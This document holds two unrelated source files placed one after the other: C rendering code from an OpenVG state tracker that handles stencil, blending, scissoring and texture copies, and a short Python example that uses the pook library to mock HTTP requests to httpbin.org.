dsa.stencil[0].enabled = 1;
dsa.stencil[0].func = PIPE_FUNC_NOTEQUAL;
dsa.stencil[0].fail_op = PIPE_STENCIL_OP_REPLACE;
dsa.stencil[0].zfail_op = PIPE_STENCIL_OP_REPLACE;
dsa.stencil[0].zpass_op = PIPE_STENCIL_OP_REPLACE;
dsa.stencil[0].valuemask = ~0;
dsa.stencil[0].writemask = ~0;
dsa.depth = renderer->g3d.dsa.depth;
cso_set_depth_stencil_alpha(renderer->cso, &dsa);
renderer->state = RENDERER_STATE_POLYGON_FILL;
return VG_TRUE;
}
/**
* Fill a polygon.
*/
void renderer_polygon_fill(struct renderer *renderer,
VGfloat min_x, VGfloat min_y,
VGfloat max_x, VGfloat max_y)
{
assert(renderer->state == RENDERER_STATE_POLYGON_FILL);
renderer_quad_pos(renderer, min_x, min_y, max_x, max_y, VG_TRUE);
renderer_quad_draw(renderer);
}
/**
* End polygon filling.
*/
void renderer_polygon_fill_end(struct renderer *renderer)
{
assert(renderer->state == RENDERER_STATE_POLYGON_FILL);
cso_restore_depth_stencil_alpha(renderer->cso);
renderer->state = RENDERER_STATE_INIT;
}
struct renderer * renderer_create(struct vg_context *owner)
{
struct renderer *renderer;
struct pipe_rasterizer_state *raster;
struct pipe_stencil_ref sr;
VGint i;
renderer = CALLOC_STRUCT(renderer);
if (!renderer)
return NULL;
renderer->pipe = owner->pipe;
renderer->cso = owner->cso_context;
/* init vertex data that doesn't change */
for (i = 0; i < 4; i++)
renderer->vertices[i][0][3] = 1.0f; /* w */
for (i = 0; i < 2; i++) {
renderer->velems[i].src_offset = i * 4 * sizeof(float);
renderer->velems[i].instance_divisor = 0;
renderer->velems[i].vertex_buffer_index = 0;
renderer->velems[i].src_format = PIPE_FORMAT_R32G32B32A32_FLOAT;
}
cso_set_vertex_elements(renderer->cso, 2, renderer->velems);
/* GL rasterization rules */
raster = &renderer->g3d.rasterizer;
memset(raster, 0, sizeof(*raster));
raster->gl_rasterization_rules = 1;
raster->depth_clip = 1;
cso_set_rasterizer(renderer->cso, raster);
/* fixed at 0 */
memset(&sr, 0, sizeof(sr));
cso_set_stencil_ref(renderer->cso, &sr);
renderer_set_vs(renderer, RENDERER_VS_PLAIN);
renderer->state = RENDERER_STATE_INIT;
return renderer;
}
void renderer_destroy(struct renderer *ctx)
{
int i;
for (i = 0; i < NUM_RENDERER_VS; i++) {
if (ctx->cached_vs[i])
cso_delete_vertex_shader(ctx->cso, ctx->cached_vs[i]);
}
for (i = 0; i < NUM_RENDERER_FS; i++) {
if (ctx->cached_fs[i])
cso_delete_fragment_shader(ctx->cso, ctx->cached_fs[i]);
}
pipe_resource_reference(&ctx->vs_cbuf, NULL);
pipe_resource_reference(&ctx->fs_cbuf, NULL);
FREE(ctx);
}
static void update_clip_state(struct renderer *renderer,
const struct vg_state *state)
{
struct pipe_depth_stencil_alpha_state *dsa = &renderer->g3d.dsa;
memset(dsa, 0, sizeof(struct pipe_depth_stencil_alpha_state));
if (state->scissoring) {
struct pipe_framebuffer_state *fb = &renderer->g3d.fb;
int i;
renderer_scissor_begin(renderer, VG_FALSE);
for (i = 0; i < state->scissor_rects_num; ++i) {
const float x = state->scissor_rects[i * 4 + 0].f;
const float y = state->scissor_rects[i * 4 + 1].f;
const float width = state->scissor_rects[i * 4 + 2].f;
const float height = state->scissor_rects[i * 4 + 3].f;
VGint x0, y0, x1, y1, iw, ih;
x0 = (VGint) x;
y0 = (VGint) y;
if (x0 < 0)
x0 = 0;
if (y0 < 0)
y0 = 0;
/* note that x1 and y1 are exclusive */
x1 = (VGint) ceilf(x + width);
y1 = (VGint) ceilf(y + height);
if (x1 > fb->width)
x1 = fb->width;
if (y1 > fb->height)
y1 = fb->height;
iw = x1 - x0;
ih = y1 - y0;
if (iw > 0 && ih> 0 )
renderer_scissor(renderer, x0, y0, iw, ih);
}
renderer_scissor_end(renderer);
dsa->depth.enabled = 1; /* glEnable(GL_DEPTH_TEST); */
dsa->depth.writemask = 0;/*glDepthMask(FALSE);*/
dsa->depth.func = PIPE_FUNC_GEQUAL;
}
}
static void renderer_validate_blend(struct renderer *renderer,
const struct vg_state *state,
enum pipe_format fb_format)
{
struct pipe_blend_state blend;
memset(&blend, 0, sizeof(blend));
blend.rt[0].colormask = PIPE_MASK_RGBA;
blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ZERO;
blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_ZERO;
/* TODO alpha masking happens after blending? */
switch (state->blend_mode) {
case VG_BLEND_SRC:
blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ZERO;
blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_ZERO;
break;
case VG_BLEND_SRC_OVER:
/* use the blend state only when there is no alpha channel */
if (!util_format_has_alpha(fb_format)) {
blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_SRC_ALPHA;
blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_INV_SRC_ALPHA;
blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_INV_SRC_ALPHA;
blend.rt[0].blend_enable = 1;
}
break;
case VG_BLEND_SRC_IN:
blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_DST_ALPHA;
blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ZERO;
blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_ZERO;
blend.rt[0].blend_enable = 1;
break;
case VG_BLEND_DST_IN:
blend.rt[0].rgb_src_factor = PIPE_BLENDFACTOR_ZERO;
blend.rt[0].alpha_src_factor = PIPE_BLENDFACTOR_ZERO;
blend.rt[0].rgb_dst_factor = PIPE_BLENDFACTOR_ONE;
blend.rt[0].alpha_dst_factor = PIPE_BLENDFACTOR_SRC_ALPHA;
blend.rt[0].blend_enable = 1;
break;
case VG_BLEND_DST_OVER:
case VG_BLEND_MULTIPLY:
case VG_BLEND_SCREEN:
case VG_BLEND_DARKEN:
case VG_BLEND_LIGHTEN:
case VG_BLEND_ADDITIVE:
/* need a shader */
break;
default:
assert(!"not implemented blend mode");
break;
}
cso_set_blend(renderer->cso, &blend);
}
/**
* Propogate OpenVG state changes to the renderer. Only framebuffer, blending
* and scissoring states are relevant here.
*/
void renderer_validate(struct renderer *renderer,
VGbitfield dirty,
const struct st_framebuffer *stfb,
const struct vg_state *state)
{
assert(renderer->state == RENDERER_STATE_INIT);
dirty |= renderer->dirty;
renderer->dirty = 0;
if (dirty & FRAMEBUFFER_DIRTY) {
struct pipe_framebuffer_state *fb = &renderer->g3d.fb;
struct matrix *proj = &renderer->projection;
memset(fb, 0, sizeof(struct pipe_framebuffer_state));
fb->width = stfb->width;
fb->height = stfb->height;
fb->nr_cbufs = 1;
fb->cbufs[0] = stfb->strb->surface;
fb->zsbuf = stfb->dsrb->surface;
cso_set_framebuffer(renderer->cso, fb);
vg_set_viewport(renderer, VEGA_Y0_BOTTOM);
matrix_load_identity(proj);
matrix_translate(proj, -1.0f, -1.0f);
matrix_scale(proj, 2.0f / fb->width, 2.0f / fb->height);
/* we also got a new depth buffer */
if (dirty & DEPTH_STENCIL_DIRTY) {
renderer->pipe->clear(renderer->pipe,
PIPE_CLEAR_DEPTHSTENCIL, NULL, 0.0, 0);
}
}
/* must be last because it renders to the depth buffer*/
if (dirty & DEPTH_STENCIL_DIRTY) {
update_clip_state(renderer, state);
cso_set_depth_stencil_alpha(renderer->cso, &renderer->g3d.dsa);
}
if (dirty & BLEND_DIRTY)
renderer_validate_blend(renderer, state, stfb->strb->format);
}
/**
* Prepare the renderer for OpenVG pipeline.
*/
void renderer_validate_for_shader(struct renderer *renderer,
const struct pipe_sampler_state **samplers,
struct pipe_sampler_view **views,
VGint num_samplers,
const struct matrix *modelview,
void *fs,
const void *const_buffer,
VGint const_buffer_len)
{
struct matrix mvp = renderer->projection;
/* will be used in POLYGON_STENCIL and POLYGON_FILL */
matrix_mult(&mvp, modelview);
renderer_set_mvp(renderer, &mvp);
renderer_set_custom_fs(renderer, fs,
samplers, views, num_samplers,
const_buffer, const_buffer_len);
}
void renderer_validate_for_mask_rendering(struct renderer *renderer,
struct pipe_surface *dst,
const struct matrix *modelview)
{
struct matrix mvp = renderer->projection;
/* will be used in POLYGON_STENCIL and POLYGON_FILL */
matrix_mult(&mvp, modelview);
renderer_set_mvp(renderer, &mvp);
renderer_set_target(renderer, dst, renderer->g3d.fb.zsbuf, VG_FALSE);
renderer_set_blend(renderer, ~0);
renderer_set_fs(renderer, RENDERER_FS_WHITE);
/* set internal dirty flags (hacky!) */
renderer->dirty = FRAMEBUFFER_DIRTY | BLEND_DIRTY;
}
void renderer_copy_surface(struct renderer *ctx,
struct pipe_surface *src,
int srcX0, int srcY0,
int srcX1, int srcY1,
struct pipe_surface *dst,
int dstX0, int dstY0,
int dstX1, int dstY1,
float z, unsigned filter)
{
struct pipe_context *pipe = ctx->pipe;
struct pipe_screen *screen = pipe->screen;
struct pipe_sampler_view view_templ;
struct pipe_sampler_view *view;
struct pipe_box src_box;
struct pipe_resource texTemp, *tex;
const struct pipe_framebuffer_state *fb = &ctx->g3d.fb;
const int srcW = abs(srcX1 - srcX0);
const int srcH = abs(srcY1 - srcY0);
const int srcLeft = MIN2(srcX0, srcX1);
const int srcTop = MIN2(srcY0, srcY1);
assert(filter == PIPE_TEX_MIPFILTER_NEAREST ||
filter == PIPE_TEX_MIPFILTER_LINEAR);
if (srcLeft != srcX0) {
/* left-right flip */
int tmp = dstX0;
dstX0 = dstX1;
dstX1 = tmp;
}
if (srcTop != srcY0) {
/* up-down flip */
int tmp = dstY0;
dstY0 = dstY1;
dstY1 = tmp;
}
assert(screen->is_format_supported(screen, src->format, PIPE_TEXTURE_2D,
0, PIPE_BIND_SAMPLER_VIEW));
assert(screen->is_format_supported(screen, dst->format, PIPE_TEXTURE_2D,
0, PIPE_BIND_SAMPLER_VIEW));
assert(screen->is_format_supported(screen, dst->format, PIPE_TEXTURE_2D,
0, PIPE_BIND_RENDER_TARGET));
/*
* XXX for now we're always creating a temporary texture.
* Strictly speaking that's not always needed.
*/
/* create temp texture */
memset(&texTemp, 0, sizeof(texTemp));
texTemp.target = PIPE_TEXTURE_2D;
texTemp.format = src->format;
texTemp.last_level = 0;
texTemp.width0 = srcW;
texTemp.height0 = srcH;
texTemp.depth0 = 1;
texTemp.array_size = 1;
texTemp.bind = PIPE_BIND_SAMPLER_VIEW;
tex = screen->resource_create(screen, &texTemp);
if (!tex)
return;
u_sampler_view_default_template(&view_templ, tex, tex->format);
view = pipe->create_sampler_view(pipe, tex, &view_templ);
if (!view)
return;
u_box_2d_zslice(srcLeft, srcTop, src->u.tex.first_layer, srcW, srcH, &src_box);
pipe->resource_copy_region(pipe,
tex, 0, 0, 0, 0, /* dest */
src->texture, 0, &src_box);
assert(floatsEqual(z, 0.0f));
/* draw */
if (fb->cbufs[0] == dst) {
/* transform back to surface coordinates */
dstY0 = dst->height - dstY0;
dstY1 = dst->height - dstY1;
if (renderer_drawtex_begin(ctx, view)) {
renderer_drawtex(ctx,
dstX0, dstY0, dstX1 - dstX0, dstY1 - dstY0,
0, 0, view->texture->width0, view->texture->height0);
renderer_drawtex_end(ctx);
}
}
else {
if (renderer_copy_begin(ctx, dst, VG_TRUE, view)) {
renderer_copy(ctx,
dstX0, dstY0, dstX1 - dstX0, dstY1 - dstY0,
0, 0, view->texture->width0, view->texture->height0);
renderer_copy_end(ctx);
}
}
}
void renderer_texture_quad(struct renderer *r,
struct pipe_resource *tex,
VGfloat x1offset, VGfloat y1offset,
VGfloat x2offset, VGfloat y2offset,
VGfloat x1, VGfloat y1,
VGfloat x2, VGfloat y2,
VGfloat x3, VGfloat y3,
VGfloat x4, VGfloat y4)
{
const VGfloat z = 0.0f;
assert(r->state == RENDERER_STATE_INIT);
assert(tex->width0 != 0);
assert(tex->height0 != 0);
cso_save_vertex_shader(r->cso);
renderer_set_vs(r, RENDERER_VS_TEXTURE);
/* manually set up positions */
r->vertices[0][0][0] = x1;
r->vertices[0][0][1] = y1;
r->vertices[0][0][2] = z;
r->vertices[1][0][0] = x2;
r->vertices[1][0][1] = y2;
r->vertices[1][0][2] = z;
r->vertices[2][0][0] = x3;
r->vertices[2][0][1] = y3;
r->vertices[2][0][2] = z;
r->vertices[3][0][0] = x4;
r->vertices[3][0][1] = y4;
r->vertices[3][0][2] = z;
/* texcoords */
renderer_quad_texcoord(r, x1offset, y1offset,
x2offset, y2offset, tex->width0, tex->height0);
renderer_quad_draw(r);
cso_restore_vertex_shader(r->cso);
}
| 22,173 |
304 |
<reponame>Megarushing/pook
import pook
import requests
# Enable mock engine
pook.on()
pook.get('httpbin.org/ip',
reply=403, response_type='json',
response_headers={'server': 'pook'},
response_json={'error': 'not found'})
pook.get('httpbin.org/headers',
reply=404, response_type='json',
response_headers={'server': 'pook'},
response_json={'error': 'not found'})
res = requests.get('http://httpbin.org/ip')
print('Status:', res.status_code)
print('Headers:', res.headers)
print('Body:', res.json())
res = requests.get('http://httpbin.org/headers')
print('Status:', res.status_code)
print('Headers:', res.headers)
print('Body:', res.json())
print('Is done:', pook.isdone())
print('Pending mocks:', pook.pending_mocks())
print('Unmatched requests:', pook.unmatched_requests())
| 330 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.